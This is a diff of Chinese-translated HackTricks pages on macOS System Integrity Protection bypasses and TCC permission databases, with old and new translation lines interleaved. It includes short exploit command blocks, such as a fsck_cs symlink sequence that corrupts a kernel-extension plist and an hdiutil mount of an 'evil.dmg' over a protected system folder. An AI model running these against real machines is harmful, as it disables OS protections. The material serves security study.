[**来自此博客文章的研究人员**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) 发现了 macOS 的系统完整性保护SIP机制中的一个漏洞称为 'Shrootless' 漏洞。此漏洞围绕 **`system_installd`** 守护程序展开,该守护程序具有一个授权 **`com.apple.rootless.install.heritable`**,允许其任何子进程绕过 SIP 的文件系统限制。
[**来自此博客文章的研究人员**](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) 发现了 macOS 的系统完整性保护SIP机制中的一个漏洞称为“Shrootless”漏洞。该漏洞围绕 **`system_installd`** 守护进程,该进程具有权限 **`com.apple.rootless.install.heritable`**,允许其任何子进程绕过 SIP 的文件系统限制。
**`system_installd`** 守护程将安装由 **Apple** 签名的程序包。
**`system_installd`** 守护程将安装由 **Apple** 签名的包。
研究人员发现,在安装 Apple 签名的程序包(.pkg 文件)期间,**`system_installd`** 将 **运行** 包中包含的任何 **后安装** 脚本。这些脚本由默认 shell **`zsh`** 执行,该 shell 会自动 **运行** `/etc/zshenv` 文件中的命令(如果存在),即使在非交互模式下也是如此。攻击者可以利用这种行为:通过创建一个恶意的 `/etc/zshenv` 文件并等待 **`system_installd` 调用 `zsh`**,他们可以在设备上执行任意操作。
研究人员发现,在安装 Apple 签名的包(.pkg 文件)时,**`system_installd`** **运行** 包中包含的任何 **后安装** 脚本。这些脚本由默认 shell **`zsh`** 执行,如果存在,即使在非交互模式下,也会自动 **运行** 来自 **`/etc/zshenv`** 文件的命令。攻击者可以利用这种行为:通过创建恶意的 `/etc/zshenv` 文件并等待 **`system_installd` 调用 `zsh`**,他们可以在设备上执行任意操作。
此外,发现 **`/etc/zshenv` 可以用作一般攻击技术**,不仅仅是用于绕过 SIP。每个用户配置文件都有一个 `~/.zshenv` 文件,它的行为方式与 `/etc/zshenv` 相同,但不需要 root 权限。这个文件可以用作持久性机制,每次 `zsh` 启动时触发,或者用作特权提升机制。如果管理员用户使用 `sudo -s``sudo <command>` 提升到 root`~/.zshenv` 文件将被触发,有效地提升到 root
此外,发现 **`/etc/zshenv` 可以作为一种通用攻击技术**,不仅仅用于 SIP 绕过。每个用户配置文件都有一个 `~/.zshenv` 文件,其行为与 `/etc/zshenv` 相同,但不需要根权限。该文件可以用作持久性机制,每次 `zsh` 启动时触发,或作为提升权限机制。如果管理员用户使用 `sudo -s``sudo <command>` 提升到根,`~/.zshenv` 文件将被触发,有效地提升到根
#### [**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/)
在 [**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/) 中发现,同一个 **`system_installd`** 进程仍然可能被滥用,因为它将 **后安装脚本放在了 `/tmp` 中受 SIP 保护的随机命名文件夹内**。问题在于 **`/tmp` 本身并未受 SIP 保护**,因此可以在其上 **挂载** 虚拟映像,然后 **安装程序** 将在其中放置 **后安装脚本****卸载** 虚拟映像,**重新创建** 所有 **文件夹** 并添加 **后安装** 脚本以执行 **载荷**
在 [**CVE-2022-22583**](https://perception-point.io/blog/technical-analysis-cve-2022-22583/) 中发现同样的 **`system_installd`** 进程仍然可以被滥用,因为它将 **后安装脚本放在 SIP 保护的 `/tmp` 中的随机命名文件夹内**。问题是 **`/tmp` 本身并不受 SIP 保护**,因此可以 **挂载** 一个 **虚拟映像**,然后 **安装程序** 会将 **后安装脚本** 放入其中**卸载** 虚拟映像,**重新创建** 所有 **文件夹** **添加** 带有 **有效负载** **后安装** 脚本以执行。
#### [fsck\_cs 实用程序](https://www.theregister.com/2016/03/30/apple\_os\_x\_rootless/)
#### [fsck\_cs 工具](https://www.theregister.com/2016/03/30/apple\_os\_x\_rootless/)
发现了一个漏洞,**`fsck_cs`** 被误导以跟随 **符号链接**,导致其损坏一个关键文件。具体来说,攻击者从 _`/dev/diskX`_ 到文件 `/System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist` 创建了一个链接。在 _`/dev/diskX`_ 上执行 **`fsck_cs`** 导致 `Info.plist` 的损坏。该文件的完整性对操作系统的 SIP系统完整性保护至关重要控制内核扩展的加载。一旦损坏SIP 管理内核排除的能力就会受到影响。
发现了一个漏洞,其中 **`fsck_cs`** 被误导以破坏一个关键文件,因为它能够跟随 **符号链接**。具体来说,攻击者从 _`/dev/diskX`_ 创建了一个指向文件 `/System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist`链接。在 _`/dev/diskX`_ 上执行 **`fsck_cs`** 导致 `Info.plist` 的损坏。该文件的完整性对操作系统的 SIP系统完整性保护至关重要SIP 控制内核扩展的加载。一旦损坏SIP 管理内核排除的能力就会受到影响。
利用此漏洞的命令
利用此漏洞的命令
```bash
ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX
fsck_cs /dev/diskX 1>&-
touch /Library/Extensions/
reboot
```
这个漏洞的利用有严重的影响。`Info.plist`文件通常负责管理内核扩展的权限,但变得无效。这包括无法列入黑名单某些扩展,比如`AppleHWAccess.kext`。因此由于SIP的控制机制失效这个扩展可以被加载从而授予对系统RAM的未经授权的读写访问。
该漏洞的利用具有严重的影响。`Info.plist` 文件,通常负责管理内核扩展的权限,变得无效。这包括无法将某些扩展列入黑名单,例如 `AppleHWAccess.kext`。因此,由于 SIP 的控制机制失效,该扩展可以被加载,从而授予对系统 RAM 的未经授权的读写访问。
#### [SIP受保护的文件夹上挂载](https://www.slideshare.net/i0n1c/syscan360-stefan-esser-os-x-el-capitan-sinking-the-ship)
#### [ SIP 保护的文件夹上挂载](https://www.slideshare.net/i0n1c/syscan360-stefan-esser-os-x-el-capitan-sinking-the-ship)
可以在**SIP受保护的文件夹上挂载一个新的文件系统以绕过保护**
可以在 **SIP 保护的文件夹上挂载新的文件系统以绕过保护**
```bash
mkdir evil
# Add contento to the folder
hdiutil create -srcfolder evil evil.dmg
hdiutil attach -mountpoint /System/Library/Snadbox/ evil.dmg
```
#### [升级程序绕过2016](https://objective-see.org/blog/blog\_0x14.html)
#### [升级绕过 (2016)](https://objective-see.org/blog/blog\_0x14.html)
系统设置为从`Install macOS Sierra.app`中的嵌入式安装程序磁盘映像启动以升级操作系统,利用`bless`实用程序。使用的命令如下:
系统设置为从 `Install macOS Sierra.app` 中的嵌入式安装程序磁盘映像启动以升级操作系统,利用 `bless` 工具。使用的命令如下:
```bash
/usr/sbin/bless -setBoot -folder /Volumes/Macintosh HD/macOS Install Data -bootefi /Volumes/Macintosh HD/macOS Install Data/boot.efi -options config="\macOS Install Data\com.apple.Boot" -label macOS Installer
```
安全性可能会受到损害,如果攻击者在引导前更改升级镜像(`InstallESD.dmg`)。该策略涉及用恶意版本 (`libBaseIA.dylib`) 替换动态加载器 (dyld)。这种替换导致在启动安装程序时执行攻击者的代码。
该过程的安全性可能会受到威胁,如果攻击者在启动之前更改了升级映像(`InstallESD.dmg`)。该策略涉及用恶意版本(`libBaseIA.dylib`替换动态加载器dyld。此替换导致在启动程序时执行攻击者的代码。
攻击者的代码在升级过程中获得控制权,利用系统对安装程序的信任。攻击通过方法混淆来修改 `InstallESD.dmg` 镜像,特别是针对 `extractBootBits` 方法。这允许在磁盘映像被使用之前注入恶意代码。
攻击者的代码在升级过程中获得控制权,利用系统对安装程序的信任。攻击通过通过方法交换method swizzling更改`InstallESD.dmg`映像,特别针对`extractBootBits`方法。这允许在使用磁盘映像之前注入恶意代码。
此外,在 `InstallESD.dmg` 中,有一个 `BaseSystem.dmg`,用作升级代码的根文件系统。将动态库注入其中允许恶意代码在能够修改操作系统级文件的进程中运行,显著增加了系统受损的可能性
此外,在`InstallESD.dmg`中,有一个`BaseSystem.dmg`,它作为升级代码的根文件系统。将动态库注入其中允许恶意代码在能够更改操作系统级文件的进程中运行,显著增加了系统被攻陷的潜力
#### [systemmigrationd (2023)](https://www.youtube.com/watch?v=zxZesAN-TEk)
[**DEF CON 31**](https://www.youtube.com/watch?v=zxZesAN-TEk) 这次演讲中,展示了 **`systemmigrationd`**(可以绕过 SIP如何执行 **bash** **perl** 脚本,可以通过环境变量 **`BASH_ENV`** **`PERL5OPT`** 进行滥用。
在[**DEF CON 31**](https://www.youtube.com/watch?v=zxZesAN-TEk)的演讲中,展示了**`systemmigrationd`**可以绕过SIP如何执行**bash**和**perl**脚本,可以通过环境变量**`BASH_ENV`**和**`PERL5OPT`**进行滥用。
#### CVE-2023-42860 <a href="#cve-a-detailed-look" id="cve-a-detailed-look"></a>
正如[**在这篇博文中详细说明的**](https://blog.kandji.io/apple-mitigates-vulnerabilities-installer-scripts)`InstallAssistant.pkg` 包中的 `postinstall` 脚本允许执行。
正如[**在这篇博中详细说明的**](https://blog.kandji.io/apple-mitigates-vulnerabilities-installer-scripts)`InstallAssistant.pkg`包中的`postinstall`脚本允许执行:
```bash
/usr/bin/chflags -h norestricted "${SHARED_SUPPORT_PATH}/SharedSupport.dmg"
```
```markdown
并且可以在`${SHARED_SUPPORT_PATH}/SharedSupport.dmg`中创建一个符号链接,允许用户**取消限制任何文件绕过SIP保护**。
and it was possible to crate a symlink in `${SHARED_SUPPORT_PATH}/SharedSupport.dmg` that would allow a user to **unrestrict any file, bypassing SIP protection**.
### **com.apple.rootless.install**
{% hint style="danger" %}
授权 **`com.apple.rootless.install`** 允许绕过SIP
该权限 **`com.apple.rootless.install`** 允许绕过 SIP
{% endhint %}
授权`com.apple.rootless.install`已知可绕过macOS上的系统完整性保护SIP。这在与[**CVE-2022-26712**](https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable/)相关的情况下被特别提到。
权限 `com.apple.rootless.install` 被认为可以绕过 macOS 的系统完整性保护 (SIP)。这在与 [**CVE-2022-26712**](https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable/) 相关时特别提到。
在这种特定情况下,位于`/System/Library/PrivateFrameworks/ShoveService.framework/Versions/A/XPCServices/SystemShoveService.xpc`的系统XPC服务拥有此授权。这允许相关进程规避SIP约束。此外该服务显著提供了一个允许移动文件而不执行任何安全措施的方法
在这个特定情况下,位于 `/System/Library/PrivateFrameworks/ShoveService.framework/Versions/A/XPCServices/SystemShoveService.xpc` 的系统 XPC 服务拥有此权限。这使得相关进程能够绕过 SIP 限制。此外,该服务显著提供了一种方法,允许在不执行任何安全措施的情况下移动文件
## 密封系统快照
## Sealed System Snapshots
密封系统快照是苹果在**macOS Big SurmacOS 11**中引入的一个功能,作为其**系统完整性保护SIP**机制的一部分,提供了额外的安全性和系统稳定性层。它们本质上是系统卷的只读版本。
Sealed System Snapshots 是 Apple 在 **macOS Big Sur (macOS 11)** 中引入的一项功能,作为其 **系统完整性保护 (SIP)** 机制的一部分,以提供额外的安全性和系统稳定性。它们本质上是系统卷的只读版本。
以下是更详细的介绍:
1. **不可变系统**密封系统快照使macOS系统卷“不可变”意味着它无法被修改。这可以防止任何未经授权或意外更改系统可能会危及安全性或系统稳定性。
2. **系统软件更新**:当您安装macOS更新或升级时macOS会创建一个新的系统快照。然后macOS启动卷使用**APFSApple文件系统**切换到这个新快照。应用更新的整个过程变得更安全、更可靠,因为系统始终可以恢复到之前的快照,如果在更新过程中出现问题。
3. **数据分离**与在macOS Catalina中引入的数据和系统卷分离概念相结合密封系统快照功能确保所有数据和设置存储在单独的“**数据**”卷上。这种分离使您的数据独立于系统,简化了系统更新过程并增强了系统安全性。
1. **不可变系统**Sealed System Snapshots 使 macOS 系统卷变为“不可变”,这意味着它无法被修改。这防止了任何未经授权或意外的更改,从而可能危及安全性或系统稳定性。
2. **系统软件更新**:当您安装 macOS 更新或升级时macOS 会创建一个新的系统快照。macOS 启动卷随后使用 **APFS (Apple 文件系统)** 切换到这个新快照。应用更新的整个过程变得更安全、更可靠,因为系统始终可以在更新过程中出现问题时恢复到先前的快照
3. **数据分离**结合在 macOS Catalina 中引入的数据和系统卷分离的概念Sealed System Snapshot 功能确保您的所有数据和设置存储在一个单独的“**数据**”卷上。这种分离使您的数据独立于系统,从而简化了系统更新过程并增强了系统安全性。
请记住这些快照由macOS自动管理由于APFS的空间共享功能它们不会占用磁盘上的额外空间。还要注意这些快照与**Time Machine快照**不同,后者是整个系统的用户可访问备份。
请记住,这些快照由 macOS 自动管理,并且由于 APFS 的空间共享功能,它们不会占用磁盘上的额外空间。还要注意的是,这些快照与 **Time Machine 快照** 不同,后者是用户可访问的整个系统的备份。
### 检查快照
### Check Snapshots
命令**`diskutil apfs list`**列出了**APFS卷的详细信息**及其布局:
命令 **`diskutil apfs list`** 列出 **APFS 卷的详细信息**及其布局:
<pre><code>+-- Container disk3 966B902E-EDBA-4775-B743-CF97A0556A13
| ====================================================
@ -230,11 +230,11 @@ hdiutil attach -mountpoint /System/Library/Snadbox/ evil.dmg
| +-> Volume disk3s1 7A27E734-880F-4D91-A703-FB55861D49B7
| | ---------------------------------------------------
<strong>| | APFS Volume Disk (Role): disk3s1 (System)
</strong>| | Name: Macintosh HD (Case-insensitive)
</strong>| | Name: Macintosh HD (不区分大小写)
<strong>| | Mount Point: /System/Volumes/Update/mnt1
</strong>| | Capacity Consumed: 12819210240 B (12.8 GB)
| | Sealed: Broken
| | FileVault: Yes (Unlocked)
| | FileVault: Yes (已解锁)
| | Encrypted: No
| | |
| | Snapshot: FAA23E0C-791C-43FF-B0E7-0E1C0810AC61
@ -245,19 +245,18 @@ hdiutil attach -mountpoint /System/Library/Snadbox/ evil.dmg
+-> Volume disk3s5 281959B7-07A1-4940-BDDF-6419360F3327
| ---------------------------------------------------
| APFS Volume Disk (Role): disk3s5 (Data)
| Name: Macintosh HD - Data (Case-insensitive)
| Name: Macintosh HD - Data (不区分大小写)
<strong> | Mount Point: /System/Volumes/Data
</strong><strong> | Capacity Consumed: 412071784448 B (412.1 GB)
</strong> | Sealed: No
| FileVault: Yes (Unlocked)
| FileVault: Yes (已解锁)
</code></pre>
上述输出中,可以看到**用户可访问位置**挂载在`/System/Volumes/Data`下。
之前的输出中,可以看到 **用户可访问的位置** 被挂载在 `/System/Volumes/Data` 下。
此外,**macOS系统卷快照**挂载在`/`下,且已**密封**由操作系统加密签名。因此如果绕过SIP并修改它**操作系统将无法启动**。
此外,**macOS 系统卷快照** 被挂载在 `/` 并且是 **密封的**(由操作系统进行加密签名)。因此,如果 SIP 被绕过并进行修改**操作系统将无法启动**。
还可以通过运行以下命令**验证启用了密封**
```
还可以通过运行来 **验证密封是否启用**
```bash
csrutil authenticated-root status
Authenticated Root status: enabled
@ -271,24 +270,25 @@ mount
<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **侵害**
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
</details>

223
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md
View file

@ -1,65 +1,66 @@
# macOS TCC
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT收藏品](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## **基本信息**
**TCC透明、同意和控制)**是一种安全协议,专注于规范应用程序权限。其主要作用是保护诸如**位置服务、联系人、照片、麦克风、摄像头、辅助功能和完全磁盘访问**等敏感功能。通过在授予应用程序对这些元素访问之前强制要求明确用户同意TCC增强了隐私和用户对其数据的控制。
**TCC透明、同意和控制)**是一种安全协议,专注于规范应用程序权限。其主要作用是保护敏感功能,如**位置服务、联系人、照片、麦克风、相机、辅助功能和完整磁盘访问**。通过在授予应用程序访问这些元素之前强制要求用户明确同意TCC增强了隐私和用户对其数据的控制。
用户在应用程序请求访问受保护功能时会遇到TCC。这通过一个提示可见允许用户**批准或拒绝访问**。此外TCC还支持直接用户操作,例如**将文件拖放到应用程序中**,以授予对特定文件的访问权限,确保应用程序仅访问明确允许的内容。
当应用程序请求访问受保护功能时,用户会遇到TCC。这通过一个提示可见允许用户**批准或拒绝访问**。此外TCC还支持用户的直接操作,例如**将文件拖放到应用程序中**,以授予对特定文件的访问,确保应用程序仅访问明确允许的内容。
![TCC提示的示例](https://rainforest.engineering/images/posts/macos-tcc/tcc-prompt.png?1620047855)
**TCC**由位于`/System/Library/PrivateFrameworks/TCC.framework/Support/tccd`的**守护程**处理,并在`/System/Library/LaunchDaemons/com.apple.tccd.system.plist`中进行配置注册mach服务`com.apple.tccd.system`)。
**TCC**由位于`/System/Library/PrivateFrameworks/TCC.framework/Support/tccd`的**守护程**处理,并在`/System/Library/LaunchDaemons/com.apple.tccd.system.plist`中配置注册mach服务`com.apple.tccd.system`)。
每个已登录用户定义的**用户模式tccd**在`/System/Library/LaunchAgents/com.apple.tccd.plist`中运行注册mach服务`com.apple.tccd`和`com.apple.usernotifications.delegate.com.apple.tccd`。
每个登录用户都有一个**用户模式tccd**在运行,定义在`/System/Library/LaunchAgents/com.apple.tccd.plist`中注册mach服务`com.apple.tccd`和`com.apple.usernotifications.delegate.com.apple.tccd`。
在这里您可以看到作为系统和用户运行的tccd
在这里您可以看到tccd作为系统和用户运行:
```bash
ps -ef | grep tcc
0 374 1 0 Thu07PM ?? 2:01.66 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd system
501 63079 1 0 6:59PM ?? 0:01.95 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd
```
权限是从父应用程序继承的权限是基于Bundle ID和Developer ID进行跟踪
权限是**从父应用程序继承**的,**权限**是**根据** **Bundle ID****Developer ID** **跟踪**的
### TCC数据库
### TCC 数据库
然后将允许/拒绝存储在一些TCC数据库中
允许/拒绝的信息存储在一些 TCC 数据库中:
- 系统范围的数据库位于 **`/Library/Application Support/com.apple.TCC/TCC.db`**。
- 此数据库受 SIP 保护,因此只有 SIP 绕过才能写入其中
- 用户TCC数据库 **`$HOME/Library/Application Support/com.apple.TCC/TCC.db`** 用于每个用户的偏好设置。
- 此数据库受保护因此只有具有高TCC权限的进程(如完全磁盘访问)才能写入其中(但不受 SIP 保护)。
* 系统范围的数据库在 **`/Library/Application Support/com.apple.TCC/TCC.db`**。
* 该数据库是**SIP 保护**的,因此只有 SIP 绕过才能写入
* 用户 TCC 数据库 **`$HOME/Library/Application Support/com.apple.TCC/TCC.db`** 用于每个用户的偏好设置。
* 该数据库受到保护,因此只有具有高 TCC 权限的进程(如完全磁盘访问)才能写入(但不受 SIP 保护)。
{% hint style="warning" %}
先前的数据库也受到 **TCC 保护以进行读取访问**。因此,除非是来自具有 TCC 特权进程的情况否则您将无法读取常规用户TCC数据库
之前的数据库也**受到 TCC 保护以进行读取访问**。因此,您**无法读取**常规用户 TCC 数据库,除非它来自具有 TCC 特权的进程
但是,请记住,具有这些高权限的进程(如 **FDA****`kTCCServiceEndpointSecurityClient`**)将能够写入用户的 TCC 数据库。
{% endhint %}
- 还有一个 **第三个** TCC 数据库位于 **`/var/db/locationd/clients.plist`**,用于指示允许访问位置服务的客户端。
- 受 SIP 保护的文件 **`/Users/carlospolop/Downloads/REG.db`**(也受 TCC 读取访问保护)包含所有有效 TCC 数据库的位置。
- 受 SIP 保护的文件 **`/Users/carlospolop/Downloads/MDMOverrides.plist`**(也受 TCC 读取访问保护)包含更多 TCC 授予的权限。
- 受 SIP 保护的文件 **`/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist`**但任何人都可以读取)是需要 TCC 异常的应用程序的允许列表。
* 在 **`/var/db/locationd/clients.plist`** 中还有一个**第三个** TCC 数据库,用于指示允许**访问位置服务**的客户端。
* SIP 保护文件 **`/Users/carlospolop/Downloads/REG.db`**(也受 TCC 读取访问保护)包含所有**有效 TCC 数据库****位置**
* SIP 保护文件 **`/Users/carlospolop/Downloads/MDMOverrides.plist`**(也受 TCC 读取访问保护)包含更多 TCC 授予的权限。
* SIP 保护文件 **`/Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist`**任何人都可以读取)是需要 TCC 例外的应用程序的允许列表。
{% hint style="success" %}
iOS 中的 TCC 数据库位于 **`/private/var/mobile/Library/TCC/TCC.db`**
**iOS** 中的 TCC 数据库在 **`/private/var/mobile/Library/TCC/TCC.db`**
{% endhint %}
{% hint style="info" %}
**通知中心 UI** 可以对系统 TCC 数据库进行更改:
**通知中心 UI** 可以对**系统 TCC 数据库**进行**更改**
{% code overflow="wrap" %}
```bash
@ -70,7 +71,7 @@ com.apple.rootless.storage.TCC
```
{% endcode %}
然而,用户可以使用**`tccutil`**命令行实用程序**删除或查询规则**
然而,用户可以使用 **`tccutil`** 命令行工具 **删除或查询规则**
{% endhint %}
#### 查询数据库
@ -123,18 +124,18 @@ sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;
{% endtabs %}
{% hint style="success" %}
检查这两个数据库,您可以检查应用程序已允许、已禁止或未拥有的权限(它会请求这些权限)。
检查两个数据库,您可以查看应用程序允许、禁止或没有的权限(它会请求权限)。
{% endhint %}
* **`service`** 是 TCC 权限的字符串表示
* **`client`** 是具有权限的 Bundle ID 或二进制文件路径
* **`client_type`** 指示它是 Bundle 标识符0还是绝对路径1
* **`service`** 是 TCC **权限** 的字符串表示
* **`client`** 是具有权限的 **bundle ID** 或 **二进制文件路径**
* **`client_type`** 指示它是 Bundle Identifier(0) 还是绝对路径(1)
<details>
<summary>如果是绝对路径,如何执行</summary>
只需执行 **`launctl load you_bin.plist`**使用类似以下的 plist 文件
只需执行 **`launctl load you_bin.plist`**plist 如下
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
@ -173,9 +174,9 @@ sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;
```
</details>
* **`auth_value`** 可以有不同的值: denied(0), unknown(1), allowed(2), 或 limited(3)。
* **`auth_reason`** 可以取以下值: Error(1), User Consent(2), User Set(3), System Set(4), Service Policy(5), MDM Policy(6), Override Policy(7), Missing usage string(8), Prompt Timeout(9), Preflight Unknown(10), Entitled(11), App Type Policy(12)
* **csreq** 字段用于指示如何验证要执行的二进制文件并授予 TCC 权限:
* **`auth_value`** 可以有不同的值denied(0)、unknown(1)、allowed(2) 或 limited(3)。
* **`auth_reason`** 可以取以下值Error(1)、User Consent(2)、User Set(3)、System Set(4)、Service Policy(5)、MDM Policy(6)、Override Policy(7)、Missing usage string(8)、Prompt Timeout(9)、Preflight Unknown(10)、Entitled(11)、App Type Policy(12)
* **csreq** 字段用于指示如何验证要执行的二进制文件并授予 TCC 权限
```bash
# Query to get cserq in printable hex
select service, client, hex(csreq) from access where auth_value=2;
@ -191,12 +192,12 @@ echo "$REQ_STR" | csreq -r- -b /tmp/csreq.bin
REQ_HEX=$(xxd -p /tmp/csreq.bin | tr -d '\n')
echo "X'$REQ_HEX'"
```
* 要了解表格的**其他字段**的更多信息,请查看[此博文](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive)。
* 有关表格的**其他字段**的更多信息,请[**查看这篇博客文章**](https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive)。
您还可以在`系统偏好设置 --> 安全性与隐私 --> 隐私 --> 文件和文件夹`中查**已授予的权限**给应用程序
您还可以在`系统偏好设置 --> 安全性与隐私 --> 隐私 --> 文件和文件夹`中查**已授予的权限**。
{% hint style="success" %}
用户可以使用**`tccutil`** **删除或查询规则**
用户_可以_ **删除或查询规则**使用**`tccutil`**。
{% endhint %}
#### 重置 TCC 权限
@ -209,7 +210,9 @@ tccutil reset All
```
### TCC 签名检查
TCC **数据库** 存储了应用程序的 **Bundle ID**,但它还存储了有关签名的 **信息**,以确保请求使用权限的应用程序是正确的应用程序。
TCC **数据库** 存储应用程序的 **Bundle ID**,但它也 **存储** **信息** 关于 **签名****确保** 请求使用权限的应用程序是正确的。
{% code overflow="wrap" %}
```bash
# From sqlite
sqlite> select service, client, hex(csreq) from access where auth_value=2;
@ -224,17 +227,17 @@ csreq -t -r /tmp/telegram_csreq.bin
{% endcode %}
{% hint style="warning" %}
因此,使用相同名称和捆绑标识的其他应用程序将无法访问授予其他应用程序的权限。
因此,使用相同名称和包 ID 的其他应用程序将无法访问授予其他应用程序的权限。
{% endhint %}
### 权限和TCC权限
### 权限与 TCC 权限
应用程序不仅需要请求并获得对某些资源的访问权限,还需要具有相关的权限。\
例如,Telegram具有权限`com.apple.security.device.camera`来请求访问摄像头。没有此权限的应用程序将无法访问摄像头(用户甚至不会被要求授予权限)。
应用程序**不仅需要**请求并获得对某些资源的**访问权限**,它们还需要**拥有相关的权限**。\
例如,**Telegram** 拥有权限 `com.apple.security.device.camera` 来请求**访问相机**。一个**没有**此**权限的应用程序将无法**访问相机(用户甚至不会被询问权限)。
然而,要访问某些用户文件夹,如`~/Desktop`、`~/Downloads`和`~/Documents`,应用程序不需要具有任何特定的权限。系统将透明地处理访问并根据需要提示用户
然而,应用程序要**访问**某些用户文件夹,例如 `~/Desktop`、`~/Downloads` 和 `~/Documents`,它们**不需要**任何特定的**权限**。系统将透明地处理访问并**根据需要提示用户**
苹果的应用程序不会生成提示。它们在其权限列表中包含预授予权利这意味着它们永远不会生成弹出窗口也不会出现在任何TCC数据库中。例如
苹果的应用程序**不会生成提示**。它们在其**权限**列表中包含**授予权利**,这意味着它们**永远不会生成弹出窗口******不会出现在任何**TCC 数据库**中。例如:
```bash
codesign -dv --entitlements :- /System/Applications/Calendar.app
[...]
